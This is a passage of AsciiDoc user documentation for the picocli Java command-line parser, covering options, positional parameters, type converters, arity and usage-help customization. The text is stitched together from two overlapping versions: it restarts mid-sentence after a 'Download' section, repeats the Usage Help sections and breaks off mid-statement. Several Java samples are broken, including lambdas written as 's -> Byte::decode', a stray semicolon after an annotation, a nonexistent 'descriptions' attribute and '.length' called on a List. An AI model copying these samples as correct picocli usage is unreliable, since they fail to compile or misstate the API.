\/\/ ...\n}\n----\n\n=== Command Name\nIn the above example, the program name is taken from the `name` attribute of the `Command` annotation:\n[source,java]\n----\n@Command(name = \"cat\")\n----\nWithout a `name` attribute, picocli will show a generic `<main class>` in the synopsis:\n----\nUsage: <main class> [-AbeEnstTuv] [--help] [--version] [FILE...]\n----\n=== Parameter Labels\nNon-boolean options require a value. The usage help should explain this, and picocli shows the option parameter\nin the synopsis and in the option list. By default, the field name is shown in `<` and `>` fish brackets.\nUse the `paramLabel` attribute to display a different name. For example:\n----\nUsage: <main class> [-f=FILE] [-n=<number>] NUM <host>\n NUM number param\n host the host parameter\n -f= FILE a file\n -n= <number> a number option\n----\nSome annotated fields in the below example class have a `paramLabel` attribute and others don't:\n[source,java]\n----\n@Command(showDefaultValues = false)\nclass ParamLabels {\n @Option(names = \"-f\", paramLabel = \"FILE\", description = \"a file\") File f;\n @Option(names = \"-n\", description = \"a number option\") int number;\n @Parameters(index = \"0\", paramLabel = \"NUM\", description = \"number param\") int n;\n @Parameters(index = \"1\", description = \"the host parameter\") InetAddress host;\n}\n----\nNOTE: For demonstration purposes the above example mixes the all-uppercase (e.g., `NUM`) style label and the fish bracket (e.g., `<number>`) style labels. For real applications, mixing these label styles should be avoided. An application should consistently use only one style.\n\n=== Hidden Options and Parameters\nOptions and Parameters with the `hidden` attribute set to `true` will not be shown in the usage help message.\nThis is useful for example when a parameter at some index is captured into multiple fields:\nby default each of these fields would be shown in the usage message, which would be confusing for users.\n\nFor example, the `all` field below is annotated as `hidden = true`:\n[source,java]\n----\n@Command(showDefaultValues = false)\nclass App {\n @Parameters(index = \"0\", description = \"destination host\") InetAddress host;\n @Parameters(index = \"1\", description = \"destination port\") int port;\n @Parameters(index = \"2..*\", description = \"files to transfer\") String[] files;\n\n @Parameters(hidden = true) String[] all;\n}\n----\nThe above will generate the following usage help message, where the `all` field is not shown:\n----\nUsage: <main class> <host> <port> [<files>...]\n host destination host\n port destination port\n files files to transfer\n----\n\n\n== Customizing Usage Help\n=== Example\nThe below example demonstrates what a customized usage message can look like.\nNote how section headings with line separators can create a more spacious usage message,\nand also that options are listed in declaration order (instead of in alphabetic order).\n----\nUsage:\n\nRecord changes to the repository.\n\ngit-commit [-ap] [--fixup=<commit>] [--squash=<commit>] [-c=<commit>]\n [-C=<commit>] [-F=<file>] [-m[=<msg>...]] [<files>...]\n\nDescription:\n\nStores the current contents of the index in a new commit along with a log\nmessage from the user describing the changes.\n\nParameters:\n <files> the files to commit\n\nOptions:\n -a, --all Tell the command to automatically stage files\n that have been modified and deleted, but new\n files you have not told Git about are not\n affected.\n -p, --patch Use the interactive patch selection interface 
to\n choose which changes to commit\n -C, --reuse-message=<commit>\n Take an existing commit object, and reuse the log\n message and the authorship information\n (including the timestamp) when creating the\n commit.\n -c, --reedit-message=<commit>\n Like -C, but with -c the editor is invoked, so\n that the user can further edit the commit\n message.\n --fixup=<commit> Construct a commit message for use with rebase\n --autosquash.\n --squash=<commit> Construct a commit message for use with rebase\n --autosquash. The commit message subject line is\n taken from the specified commit with a prefix\n of \"squash! \". Can be used with additional\n commit message options (-m\/-c\/-C\/-F).\n -F, --file=<file> Take the commit message from the given file. Use\n - to read the message from the standard input.\n -m, --message[=<msg>...] Use the given <msg> as the commit message. If\n multiple -m options are given, their values are\n concatenated as separate paragraphs.\n----\n\n=== Section Headings\nThe above spacious layout is mainly due to the section headings:\n[source,java]\n----\n@CommandLine.Command(name = \"git-commit\",\n sortOptions = false,\n headerHeading = \"Usage:%n%n\",\n synopsisHeading = \"%n\",\n descriptionHeading = \"%nDescription:%n%n\",\n parameterListHeading = \"%nParameters:%n\",\n optionListHeading = \"%nOptions:%n\",\n header = \"Record changes to the repository.\",\n description = \"Stores the current contents of the index in a new commit \" +\n \"along with a log message from the user describing the changes.\")\nclass GitCommit { ... }\n----\n\n=== Unsorted Option List\nBy default, the options list displays options in alphabetical order. Use the `sortOptions = false` attribute to display options in the order they are declared in your class.\n\n\n=== Show Default Values\nUse the `showDefaultValues = true` attribute to append the default value of the options and positional parameters to the description column.\n\n=== Abbreviated Synopsis\n=== Custom Synopsis\n=== Command Header and Description\n=== Footer\n=== Option-Parameter Separators\n\n=== Reordering Sections\nTo reorder sections of the usage message, you need to use the `CommandLine.Help` class directly. The `CommandLine::usage` method implementation looks like this:\n\n[source,java]\n----\nHelp help = new Help(new MainClass());\nStringBuilder sb = new StringBuilder()\n .append(help.headerHeading())\n .append(help.header())\n .append(help.synopsisHeading()) \/\/e.g. Usage:\n .append(help.synopsis()) \/\/e.g. <main> [OPTIONS] [ARGUMENTS]\n .append(help.descriptionHeading()) \/\/e.g. %nDescription:%n%n\n .append(help.description()) \/\/e.g. \"application description\"\n .append(help.parameterListHeading()) \/\/e.g. %nPositional parameters:%n%n\n .append(help.parameterList()) \/\/e.g. [FILE...] the files to convert\n .append(help.optionListHeading()) \/\/e.g. %nOptions:%n%n\n .append(help.optionList()) \/\/e.g. -h, --help displays this help\n .append(help.commandListHeading()) \/\/e.g. %nCommands:%n%n\n .append(help.commandList()) \/\/e.g. 
add adds a to b\n .append(help.footerHeading())\n .append(help.footer());\n----\nIn your application, instead of calling `CommandLine.usage(new MainClass(), System.err)`, you can alter the above code to, for example, list subcommands first, then global options and finally the parameters.\n\n=== Formatted Headings\nBy using the `Help` class directly as explained in the previous section,\nthe `xxxHeading()` methods can be passed arguments.\nThese arguments can be referenced by the format specifiers in the heading https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/Formatter.html[format strings]. For example:\n\n[source,java]\n----\n@Command(descriptionHeading = \"%nDescription (%1$tb %1$te, %1$tY)%n%n\")\nclass MainClass {}\n----\nThe `descriptionHeading` attribute is a format string with some date\/time conversion format specifiers and some line separators. Picocli will format this string with any arguments that are passed to the `Help::descriptionHeading(Object...)` method. For example:\n[source,java]\n----\nHelp help = new Help(new MainClass());\nCalendar c = new GregorianCalendar(2017, MAY, 23);\nString formatted = help.descriptionHeading(c);\n\nassert \"\\nDescription (May 23, 2017)\\n\\n\".equals(formatted);\n----\n\n\n\n== Advanced Usage Help Customization\n=== Custom Layout\n=== Table and Columns\n=== Option Renderer\n=== Parameter Renderer\n=== Param Label Renderer\n\n\n== Subcommands\n=== Registering Subcommands\n=== Usage Help for Subcommands\n\n\n\n== Subclassing to Reuse Options and Command Attributes\nPicocli will walk the class hierarchy to check for annotations, so you can declare common @Options and @Command attributes on a superclass and override these fields or attributes on a subclass.\n\nThe below example shows how common options like `help` and `version` can be declared as fields in a superclass so they are available in all subclasses. Similarly, annotating the superclass with default `@Command` attributes means subclasses won't need to set these attributes.\n\n[source,java]\n----\n@Command(synopsisHeading = \"%nUsage:%n%n\", descriptionHeading = \"%nDescription:%n%n\",\n parameterListHeading = \"%nParameters:%n%n\", optionListHeading = \"%nOptions:%n%n\",\n commandListHeading = \"%nCommands:%n%n\", showDefaultValues = false)\npublic abstract class AbstractCommand {\n\n @Option(names = { \"-h\", \"-?\", \"--help\" }, help = true,\n description = \"give this help list\")\n protected boolean helpRequested;\n\n @Option(names = { \"-V\", \"--version\" }, help = true,\n description = \"print program version\")\n protected boolean versionRequested;\n}\n----\n\nAll commands that extend `AbstractCommand` support the `--help` and `--version` options, and generate a usage help message in the same spacious style. 
For example:\n\n[source,java]\n----\n@Command(name = \"zip\",\n header = \"Compresses the specified FILE(s).\",\n description = \"The default action is to add or replace zipfile entries from list, \" +\n \"which can include the special name - to compress standard input.\",\n footer = \"Copyright (c) 1990-2008 Info-ZIP - Type 'zip \\\"-L\\\"' for software license.\")\npublic class ZipCommand extends AbstractCommand {\n @Option(names = { \"-o\", \"--output\" }, description = \"output file to write to\")\n private File output;\n\n @Parameters(paramLabel = \"FILE\", description = \"FILEs to compress\")\n private File[] files;\n}\n----\n\n\n== Putting it all Together\nImagine an application that takes some input files and compresses them to an output file.\n----\nCompress -o outputFile file1 file2 file3\n----\nThe program takes one option (`-o`, the output file) and one or more input files.\nOne way to accomplish this with picocli looks like this:\n\n[source, java]\n----\nimport picocli.CommandLine.*;\nimport java.io.File;\n\n@Command(name = \"Compress\", header = \"Compresses the specified input files to an output file\")\npublic class Compress {\n @Parameters(arity = \"1..*\", description = \"one or more files to compress\")\n File[] inputFiles;\n\n @Option(names = {\"-o\", \"--outfile\"}, description = \"optional output file name. If omitted, the directory name is used.\")\n File outputFile;\n\n @Option(names = {\"-h\", \"--help\"}, help = true, description = \"display this help message\")\n boolean helpRequested;\n\n public static void main(String... args) {\n try {\n Compress compress = CommandLine.parse(new Compress(), args);\n if (compress.helpRequested) {\n CommandLine.usage(new Compress(), System.err);\n return;\n }\n compress.doCompress();\n } catch (ParameterException ex) {\n System.err.println(ex.getMessage());\n CommandLine.usage(new Compress(), System.err);\n }\n }\n\n private void doCompress() { ... } \/\/ business logic of the application\n}\n----\n\n\n== Download\n\nNOTE: Here is the source. 
Copy and paste it into a file called `CommandLine.java`, add it to your project, and enjoy!\n\n[source,java]\n----\ninclude::..\/src\/main\/java\/picocli\/CommandLine.java[]\n----
Following these conventions may make your application more intuitive to use.\n\nThe below example shows options with one or more names, options that take an option parameter, and \"help\" options.\n[source,java]\n----\nclass Tar {\n @Option(names = { \"-c\", \"--create\" }, description = \"create a new archive\")\n boolean create;\n\n @Option(names = \"-x\", description = \"extract files from an archive\")\n boolean extract;\n\n @Option(names = { \"-f\", \"--file\" }, paramLabel = \"ARCHIVE\",\n description = \"use archive file or device ARCHIVE\")\n File archive;\n\n @Parameters(paramLabel = \"FILE\", description = \"one ore more files to archive\")\n File[] files;\n}\n----\nPicocli matches the option names to set the field values.\n[source,java]\n----\nString[] args = { \"-cf\", \"result.tar\", \"file1.txt\", \"file2.txt\" };\nTar tar = CommandLine.parse(new Tar(), args);\nassert tar.create;\nassert !tar.extract;\nassert tar.archive.equals(new File(\"result.tar\"));\nassert Arrays.equals(tar.files, new File[] {new File(\"file1.txt\"), new File(\"file2.txt\")});\n----\n\nPicocli supports http:\/\/pubs.opengroup.org\/onlinepubs\/9699919799\/basedefs\/V1_chap12.html#tag_12_02[POSIX clustered short options]:\nOne or more options without option-arguments, followed by at most one option that takes an option-argument, should be accepted when grouped behind one '-' delimiter.\n\n\nFor example, given this annotated class:\n[source,java]\n----\nclass ClusteredShortOptions {\n @Option(names = \"-a\") boolean a;\n @Option(names = \"-b\") boolean b;\n @Option(names = \"-c\") boolean c;\n @Option(names = \"-f\") String f;\n}\n----\nThe following command line arguments are all equivalent and parsing them will give the same result:\n\n[source,java]\n----\n<command> -abcfInputFile.txt\n<command> -a -b -c -fInputFile.txt\n<command> -a -b -c -f InputFile.txt\n<command> -a -b -c -f=InputFile.txt\n<command> -abc -f=InputFile.txt\n<command> -ab -cf=InputFile.txt\n...\n----\n\n\n=== Positional Parameters\nPositional parameters (also called operands) are the command line arguments following the options.\n\nUse the (zero-based) `index` attribute to specify exactly which parameters to capture. Omitting the `index` attribute means the field is initialized with all positional parameters (so the field should be a multi-value type like an array or a collection).\n\nThe `index` attribute accepts \"range\" values, so an annotation like `@Parameters(index=\"2..4\")` captures arguments at index 2, 3 and 4. Range values can be open-ended. For example, `@Parameters(index=\"3..*\")` captures all arguments from index 3 and up.\n\nThe advantage of capturing individual parameters in separate fields is that you can enforce strong typing. 
For example:\n\n[source,java]\n----\nclass PositionalParameters {\n @Parameters(hidden = true) \/\/ \"hidden\": don't show this parameter in usage help message\n List<String> allParameters; \/\/ no \"index\" attribute: captures _all_ arguments (as Strings)\n\n @Parameters(index = \"0\", \/\/ index=0: the first positional parameter\n description = \"Host name or IP address to connect to\")\n InetAddress host;\n\n @Parameters(index = \"1\", \/\/ index=1: the second positional parameter\n description = \"Port number to connect to\")\n int port;\n\n @Parameters(index = \"2..*\", description = \"the files to process\")\n File[] files;\n}\n----\n\nPicocli initializes fields with the values at the specified index in the arguments array.\n[source,java]\n----\nString[] args = { \"localhost\", \"12345\", \"file1.txt\", \"file2.txt\" };\nPositionalParameters params = CommandLine.parse(new PositionalParameters(), args);\nassert params.host.getHostName().equals(\"localhost\");\nassert params.port == 12345;\nassert Arrays.equals(params.files, new File[] {new File(\"file1.txt\"), new File(\"file2.txt\")});\nassert params.allParameters.equals(Arrays.asList(\"localhost\", \"12345\", \"file1.txt\", \"file2.txt\"));\n----\n\nSee <<Type Conversion>> for which types are supported out of the box and how to add custom types.\n\n=== Double dash (`--`)\nWhen one of the command line arguments is two dashes without any characters attached (`--`), picocli interprets all following arguments as positional parameters, even arguments that match an option name.\n\n[source,java]\n----\nclass DoubleDash {\n @Parameters\n List<String> params;\n\n @Option(names = \"--files\")\n List<String> files;\n\n @Option(names = { \"-v\", \"--verbose\" })\n boolean verbose;\n}\n----\n\nThe `--` clarifies which of the arguments are positional parameters:\n[source,java]\n----\nString[] args = { \"-v\", \"--\", \"--files\", \"file1\", \"file2\" };\nDoubleDash doubleDash = CommandLine.parse(new DoubleDash(), args);\n\nassert doubleDash.verbose;\nassert doubleDash.files == null;\nassert doubleDash.params != null && doubleDash.params.length == 3;\nassert doubleDash.params.equals(Arrays.asList(\"--files\", \"file1\", \"file2\"));\n----\n\n=== Option-Parameter Separators\n==== Default Separators\nOptions may take an _option parameter_ (also called _option-argument_).\nFor POSIX-style short options (like `-f` or `-c`), the option parameter may be attached to the option,\nor it may be separated by a space or the _separator string_ (`=` by default).\nThat is, all of the below are equivalent:\n[source,java]\n----\n<command> -foutput.txt\n<command> -f output.txt\n<command> -f=output.txt\n----\n\nLong option names (like `--file`) must be separated from their option parameter by a space or the\n_separator string_ (`=` by default). 
That is, the first two below examples are valid but the last example is invalid:\n[source,java]\n----\n\/\/ valid\n<command> --file output.txt\n<command> --file=output.txt\n\n\/\/ invalid (picocli will not recognize the --file option)\n<command> --fileoutput.txt\n----\n\n==== Custom Separators\nThe separator string can be customized programmatically or declaratively.\n\nUse the `separator` attribute of the `@Command` annotation to declaratively set a separator string:\n[source,java]\n----\n@Command(separator = \":\") \/\/ declaratively set a separator\nclass OptionArg {\n @Option(names = { \"-f\", \"--file\" }) String file;\n}\n----\n[source,java]\n----\nOptionArg optionArg = CommandLine.parse(new OptionArg(), \"-f:output.txt\");\nassert optionArg.file.equals(\"output.txt\");\n----\n\nAlternatively, the separator string can be changed programmatically with the `CommandLine.setSeparator(String separator)` method.\nFor example:\n[source,java]\n----\nOptionArg optionArg = new OptionArg();\nCommandLine commandLine = new CommandLine(optionArg);\n\ncommandLine.setSeparator(\":\"); \/\/ programmatically set a separator\ncommandLine.parse(\"-f:output.txt\");\nassert optionArg.file.equals(\"output.txt\");\n----\n\n\n== Type Conversion\nWhen command line options and parameters are mapped to the annotated fields,\nthe text value is converted to the type of the annotated field.\n\n=== Built-in Type Converters\nOut of the box, picocli can convert command line argument strings to any Java primitive type or their wrapper,\nFile, BigDecimal, BigInteger, InetAddress, URL, URI, Charset, UUID, regex Pattern, String, StringBuilder, CharSequence,\n`java.sql.Time` (for values in any of the `\"HH:mm\"`, `\"HH:mm:ss\"`, `\"HH:mm:ss.SSS\"`, or `\"HH:mm:ss,SSS\"` formats), and\n`java.util.Date` (for values in `\"yyyy-MM-dd\"` format).\n\n=== Custom Type Converters\nRegister a custom converter to handle data types other than the above built-in ones.\n\nCustom converters need to implement the `picocli.CommandLine.ITypeConverter` interface:\n\n[source,java]\n----\npublic interface ITypeConverter<K> {\n \/**\n * Converts the specified command line argument value to some domain object.\n * @param value the command line argument String value\n * @return the resulting domain object\n * @throws Exception an exception detailing what went wrong during the conversion\n *\/\n K convert(String value) throws Exception;\n}\n----\n\nCustom type converters can be registered with the `CommandLine.registerConverter(Class<K> cls, ITypeConverter<K> converter)`\nmethod.\n\n\nNOTE: Picocli works with Java 5 and higher, so it does not have default converters for Java 8 types like `Path` or\n`Duration`. Lambdas make it easy to register custom converters for these types:\n\n[source,java]\n----\ncommandLine.registerConverter(java.nio.file.Path.class, s -> java.nio.file.Paths.get(s));\ncommandLine.registerConverter(java.time.Duration.class, s -> java.time.Duration.parse(s));\n----\n\nAfter registering custom converters, call the `parse(String...)` method on the `CommandLine` instance where the converters are registered. The static `parse` method cannot be used. 
For example:\n\n[source,java]\n----\nclass App {\n @Parameters Path path;\n @Option(names = \"-d\") Duration duration;\n}\n----\n\n[source,java]\n----\nApp app = new App();\nCommandLine commandLine = new CommandLine(app);\ncommandLine.registerConverter(Path.class, s -> Paths.get(s));\ncommandLine.registerConverter(Duration.class, s -> Duration.parse(s));\n\ncommandLine.parse(\"-d\", \"PT15M\", \"file1.txt\");\nassert app.path.equals(Paths.get(\"file1.txt\"));\nassert app.duration.equals(Duration.parse(\"PT15M\"));\n----\n\n=== Arrays and Collections\n\nIMPORTANT: With array fields picocli uses reflection to discover the array element type, but with collections, Java type erasure means picocli cannot find out the generic type of the collection. For non-String collections, use the `type` attribute to explicitly tell picocli what type to convert the command line arguments to.\n\nMultiple parameters can be captured together in a single array or `Collection` field. When using a collection, use the `type` attribute to specify the collection element type. For example:\n\n[source,java]\n----\nclass Convert {\n @Option(type = java.util.regex.Pattern.class, \/\/ List elements are Pattern objects\n names = \"-patterns\",\n description = \"the regular expressions to use for the conversion\");\n List<Pattern> patterns;\n\n @Parameters(type = File.class, \/\/ convert arguments to File before adding to the List\n description = \"files to convert\")\n List<File> files;\n}\n----\n\n[source,java]\n----\nString[] args = { \"-patterns\", \"a*b\", \"[a-e][i-u]\", \"--\", \"file1.txt\", \"file2.txt\" };\nConvert convert = CommandLine.parse(new Convert(), args);\n\n\/\/ convert.patterns now has two Pattern objects\n\/\/ convert.files now has two File objects\n----\n\nNOTE: If a collection is returned from a type converter, picocli will add the values to the field, not the collection itself.\n\n=== Numeric Arguments\nNumeric values are interpreted as decimal numbers by default. 
If you want picocli to be more flexible, you can\nregister a custom type converter that delegates to the https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/lang\/Integer.html#decode-java.lang.String-[decode] method to convert strings to numbers.\n\nNOTE: The `decode` method looks at the prefix to determine the radix, so numbers\nstarting with `0x`, `0X` or `#` are interpreted as hexadecimal numbers, numbers starting with `0` are interpreted\nas octal numbers, and otherwise the number is interpreted as a decimal number.\n\nJava 8-style lambdas:\n[source,java]\n----\ncommandLine.registerConverter(Byte.class, s -> Byte::decode);\ncommandLine.registerConverter(Byte.TYPE, s -> Byte::decode);\ncommandLine.registerConverter(Short.class, s -> Short::decode);\ncommandLine.registerConverter(Short.TYPE, s -> Short::decode);\ncommandLine.registerConverter(Integer.class, s -> Integer::decode);\ncommandLine.registerConverter(Integer.TYPE, s -> Integer::decode);\ncommandLine.registerConverter(Long.class, s -> Long::decode);\ncommandLine.registerConverter(Long.TYPE, s -> Long::decode);\n----\n\nIn Java 5 this becomes a bit more verbose:\n[source,java]\n----\nITypeConverter<Integer> intConverter = new ITypeConverter<Integer>() {\n public Integer convert(String s) {\n return Integer.decode(s);\n }\n};\ncommandLine.registerConverter(Integer.class, intConverter);\ncommandLine.registerConverter(Integer.TYPE, intConverter);\n...\n----\n\n\n== Arity\nArity is the number of parameters that will be consumed by an option.\nMost of the time picocli will consume the right number of parameters automatically and you don't need to worry about this.\n\nWhen an option or parameters field has a type that can hold multiple values (an array or a collection),\nthe `arity` attribute lets you control exactly how many parameters are captured by this field.\n\n=== Default Arity\nThe default arity value of a field annotated with `@Option` or `@Parameters` depends on the field's type.\n\n* Boolean fields: arity is zero (no parameter is consumed - the field is set to `true` when the option name is recognized).\n* Single-valued types like `int`, `String`, `File`: arity is one (consume one parameter). Omitting the option parameter results in a ParameterException: \"Missing required parameter for field '<field-name>'\".\n* Multi-valued types like arrays or collections: consume from zero up to all available parameters.\n\n\n=== Boolean Options with Explicit Parameters\nIt is possible to explicitly specify \"true\" or \"false\" as a parameter for a boolean option by defining an explicit <<Arity: Minimum and Maximum Number of Parameters,`arity`>> attribute. A boolean option with `arity = \"0..1\"` accepts zero to one parameters, `arity = \"1\"` means the option _must_ have one parameter. 
For example:\n\n[source, java]\n----\nclass BooleanOptionWithParameters {\n @Option(names = \"-x\", arity = \"1\", description = \"1 mandatory parameter\")\n boolean x;\n\n @Option(names = \"-y\", arity = \"0..1\", description = \"min 0 and max 1 parameter\")\n boolean y;\n}\n----\n\nThe following ways to invoke the program will be accepted (values are not case sensitive):\n----\n<command> -x true\n<command> -x FALSE\n<command> -x TRUE -y\n<command> -x True -y False\n----\n\nBut trying to specify the `-x` option without a parameter, or with a value other than \"true\" or \"false\" (case insensitive) will result in a `ParameterException`.\n\n=== Arrays and Collections\nOption fields of type array or `List` (or any class extending `Collection`) will be able to hold multiple values.\nBy default, picocli will capture arguments into these fields until it encounters a command line argument that is\nan option name or a registered command name.\n\nThe `arity` attribute can be used to specify the exact number of required parameters, or a range with a minimum and a maximum number of parameters. The maximum can be a fixed number, or can be `\"*\"` to denote \"any number\" of parameters. For example:\n[source, java]\n----\nclass MyProgram {\n @Parameters(arity = \"3\", descriptions = \"exactly three Files\")\n File[] files;\n\n @Option(names = \"-f\", arity = \"2..4\", description = \"two to four floating point numbers\")\n double[] doubles;\n\n @Option(names = \"-s\", arity = \"1..*\", description = \"at least one string\")\n String[] strings;\n}\n----\nA `MissingParameterException` is thrown when fewer than the miminum number of required parameters is specified as command line arguments. Options with an exact number or an exact range will consume up to the maximum number of parameters.\n\nOnce the minimum number of parameters is consumed, picocli will check for each subsequent command line argument whether it is another parameter, or a new option. For example:\n\n----\n<command> -s A B C -f 1.0 2.0 3.0\n----\nThe above command line arguments will be parsed as three parameters for the `-s` option, followed by three parameters for the `-f` option.\n\n=== Ambiguous Input\nPositional parameters do not have an option name, so it is not always easy to decide where they start. The below example command line arguments will be parsed as six parameters for the `-s` option, not as three strings and three files:\n----\n<command> -s A B C file1 file2 file3\n----\n\nUsers can disambiguate the input by specifying a double dash (`--`) after the option parameters.\nThe argument `--` is interpreted as a delimiter indicating the end of options. Any following arguments are treated as positional parameters. For example, the following command line arguments will be parsed as three strings and three files:\n----\n<command> -s A B C -- file1 file2 file3\n----\n\n=== Option-Parameter Separators and Arity\n\nIMPORTANT: A separator clarifies that a parameter belongs to an option, but does not prevent subsequent parameters from also being assigned to the same option. For example:\n\n[source,java]\n----\n@Option(names = \"-opt\", arity = \"2\") List<String> values;\n@Parameters List<String> remainder;\n----\nBecause arity is 2, both parameters in the below example are assigned to the `-opt` option:\n----\n<command> -opt=val1 val2\n----\n\n\n\n== Required Options\n=== Options\nOptions can be marked `required` to make it mandatory for the user to specify them on the command line. 
When a required option is not specified, a `MissingParameterException` is thrown from the `parse` method. For example:\n[source, java]\n----\nclass MandatoryOption {\n @Option(names = \"-n\", required = true, description = \"mandatory number\")\n int number;\n\n @Parameters\n File[] files;\n}\n----\nThe following command line arguments would result in an exception complaining that `number` is missing:\n----\n\/\/ invalid: missing option -n\n<command> file1 file2 file3\n----\nThe following command line arguments would be accepted:\n----\n\/\/ valid: required option -n has a value\n<command> -n 123 file1 file2 file3\n----\n\n=== Parameters\nUse the `arity` attribute to make `@Parameters` mandatory:\n[source, java]\n----\nclass BothOptionAndParametersMandatory {\n @Parameters(arity = \"1..*\", descriptions = \"at least one File\")\n File[] files;\n\n @Option(names = \"-n\", required = true, description = \"mandatory number\")\n int number;\n}\n----\nThe following command line arguments would result in an exception complaining that `files` are missing:\n----\n\/\/ invalid: missing file parameters\n<command> -n 123\n----\nThe following command line arguments would be accepted:\n----\n\/\/ valid: both required fields have a value\n<command> -n 123 file1\n----\n\n\n\n== Help Options\nOptions with the attribute `help = true` are special: if one of the command line arguments is a \"help\" option, picocli will stop parsing the remaining arguments and will not check for required options.\n\n[source,java]\n----\n@Option(names = {\"-h\", \"--help\"}, help = true, description = \"display this help message\")\nboolean helpRequested;\n----\nThis is suitable for options that should trigger the usage help message or application version information being shown on the console.\n\nIt is the responsibility of the application to check the field and show the usage help message:\n[source,java]\n----\nCompress app = CommandLine.parse(new App(), args);\nif (app.helpRequested) {\n CommandLine.usage(new App(), System.err);\n return;\n}\n----\n\n== Usage Help\n=== Example\nA default picocli usage help message looks like this:\n----\nUsage: cat [-AbeEnstTuv] [--help] [--version] [FILE...]\nConcatenate FILE(s), or standard input, to standard output.\n FILE Files whose contents to display\n -A, --show-all equivalent to -vET\n -b, --number-nonblank number nonempty output lines, overrides -n\n -e equivalent to -vET\n -E, --show-ends display $ at end of each line\n -n, --number number all output lines\n -s, --squeeze-blank suppress repeated empty output lines\n -t equivalent to -vT\n -T, --show-tabs display TAB characters as ^I\n -u (ignored)\n -v, --show-nonprinting use ^ and M- notation, except for LDF and TAB\n --help display this help and exit\n --version output version information and exit\nCopyright(c) 2017\n----\n\nThe usage help message is generated from annotation attributes, like below:\n[source,java]\n----\n@Command(name = \"cat\", footer = \"Copyright(c) 2017\",\n description = \"Concatenate FILE(s), or standard input, to standard output.\")\nclass Cat {\n\n @Parameters(paramLabel = \"FILE\", description = \"Files whose contents to display\")\n List<File> files;\n\n @Option(names = \"--help\", help = true, description = \"display this help and exit\")\n boolean help;\n\n @Option(names = \"-t\", description = \"equivalent to -vT\") boolean t;\n @Option(names = \"-e\", description = \"equivalent to -vET\") boolean e;\n @Option(names = {\"-A\", \"--show-all\"}, description = \"equivalent to -vET\") boolean all;\n\n 
\/\/ ...\n}\n----\n\n=== Command Name\nIn the above example, the program name is taken from the `name` attribute of the `Command` annotation:\n[source,java]\n----\n@Command(name = \"cat\")\n----\nWithout a `name` attribute, picocli will show a generic `<main class>` in the synopsis:\n----\nUsage: <main class> [-AbeEnstTuv] [--help] [--version] [FILE...]\n----\n=== Parameter Labels\nNon-boolean options require a value. The usage help should explain this, and picocli shows the option parameter\nin the synopsis and in the option list. By default, the field name is shown in `<` and `>` fish brackets.\nUse the `paramLabel` attribute to display a different name. For example:\n----\nUsage: <main class> [-f=FILE] [-n=<number>] NUM <host>\n NUM number param\n host the host parameter\n -f= FILE a file\n -n= <number> a number option\n----\nSome annotated fields in the below example class have a `paramLabel` attribute and others don't:\n[source,java]\n----\n@Command(showDefaultValues = false)\nclass ParamLabels {\n @Option(names = \"-f\", paramLabel = \"FILE\", description = \"a file\") File f;\n @Option(names = \"-n\", description = \"a number option\") int number;\n @Parameters(index = \"0\", paramLabel = \"NUM\", description = \"number param\") int n;\n @Parameters(index = \"1\", description = \"the host parameter\") InetAddress host;\n}\n----\nNOTE: For demonstration purposes the above example mixes the all-uppercase (e.g., `NUM`) style label and the fish bracket (e.g., `<number>`) style labels. For real applications, mixing these label styles should be avoided. An application should consistently use only one style.\n\n=== Hidden Options and Parameters\nOptions and Parameters with the `hidden` attribute set to `true` will not be shown in the usage help message.\nThis is useful for example when a parameter at some index is captured into multiple fields:\nby default each of these fields would be shown in the usage message, which would be confusing for users.\n\nFor example, the `all` field below is annotated as `hidden = true`:\n[source,java]\n----\n@Command(showDefaultValues = false)\nclass App {\n @Parameters(index = \"0\", description = \"destination host\") InetAddress host;\n @Parameters(index = \"1\", description = \"destination port\") int port;\n @Parameters(index = \"2..*\", description = \"files to transfer\") String[] files;\n\n @Parameters(hidden = true) String[] all;\n}\n----\nThe above will generate the following usage help message, where the `all` field is not shown:\n----\nUsage: <main class> <host> <port> [<files>...]\n host destination host\n port destination port\n files files to transfer\n----\n\n\n== Customizing Usage Help\n=== Example\nThe below example demonstrates what a customized usage message can look like.\nNote how section headings with line separators can create a more spacious usage message,\nand also that options are listed in declaration order (instead of in alphabetic order).\n----\nUsage:\n\nRecord changes to the repository.\n\ngit-commit [-ap] [--fixup=<commit>] [--squash=<commit>] [-c=<commit>]\n [-C=<commit>] [-F=<file>] [-m[=<msg>...]] [<files>...]\n\nDescription:\n\nStores the current contents of the index in a new commit along with a log\nmessage from the user describing the changes.\n\nParameters:\n <files> the files to commit\n\nOptions:\n -a, --all Tell the command to automatically stage files\n that have been modified and deleted, but new\n files you have not told Git about are not\n affected.\n -p, --patch Use the interactive patch selection interface 
to\n chose which changes to commit\n -C, --reuse-message=<commit>\n Take an existing commit object, and reuse the log\n message and the authorship information\n (including the timestamp) when creating the\n commit.\n -c, --reedit-message=<commit>\n Like -C, but with -c the editor is invoked, so\n that the user canfurther edit the commit\n message.\n --fixup=<commit> Construct a commit message for use with rebase\n --autosquash.\n --squash=<commit> Construct a commit message for use with rebase\n --autosquash. The commitmessage subject line is\n taken from the specified commit with a prefix\n of \"squash! \". Can be used with additional\n commit message options (-m\/-c\/-C\/-F).\n -F, --file=<file> Take the commit message from the given file. Use\n - to read the message from the standard input.\n -m, --message[=<msg>...] Use the given <msg> as the commit message. If\n multiple -m options are given, their values are\n concatenated as separate paragraphs.\n----\n\n=== Section Headings\nThe above spacious layout is mainly due to the section headings:\n[code,java]\n----\n@CommandLine.Command(name = \"git-commit\",\n sortOptions = false,\n headerHeading = \"Usage:%n%n\",\n synopsisHeading = \"%n\",\n descriptionHeading = \"%nDescription:%n%n\",\n parameterListHeading = \"%nParameters:%n\",\n optionListHeading = \"%nOptions:%n\",\n header = \"Record changes to the repository.\",\n description = \"Stores the current contents of the index in a new commit \" +\n \"along with a log message from the user describing the changes.\")\nclass GitCommit { ... }\n----\n\n=== Unsorted Option List\nBy default the options list displays options in alphabetical order. Use the `sortOptions = false` attribute to display options in the order they are declared in your class.\n\n\n=== Show Default Values\nUse the `showDefaultValues = true` attribute to append the default value of the options and positional parameters to the description column.\n\n=== Abbreviated Synopsis\n=== Custom Synopsis\n=== Command Header and Description\n=== Footer\n=== Option-Parameter Separators\n\n=== Reordering Sections\nTo reorder sections of the usage message, you need to use the `CommandLine.Help` class directly. The `CommandLine::usage` method implementation looks like this:\n\n[source,java]\n----\nMap<String, Object> subcommandMap = new HashMap<String, Object>();\nsubcommandMap.put(\"add\", new AddCommand());\n...\nHelp help = new Help(new MainClass()).addAllCommands(subcommandMap);\nStringBuilder 